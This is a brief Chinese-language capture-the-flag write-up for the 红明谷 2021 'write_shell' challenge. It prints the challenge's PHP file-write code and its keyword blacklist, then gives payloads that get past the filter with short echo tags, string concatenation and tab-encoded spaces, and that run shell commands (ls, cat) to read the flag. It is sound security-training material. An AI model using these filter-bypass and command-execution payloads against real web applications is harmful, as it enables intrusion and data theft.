[红明谷CTF 2021]write_shell1 min read

题目如下：

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

首先通读代码，了解到该题提供了查看路径和写入文件的功能，但是存在WAF机制，不允许写入黑名单中的内容。使用echo标记简写<?=绕过<?php 的限制，再用.来连接p和hp，因为分号被过滤掉了，只执行一行语句可以省略：

/?action=upload&data=<?=(ph.pinfo)()?>

输入/?action=pwd，查看路径，访问发现写入成功：

查询文件，这里需要用%09代替空格：

?action=upload&data=`ls%09/`?>

查看flag：

/?action=upload&data=`cat%09/flllllll1112222222lag`?>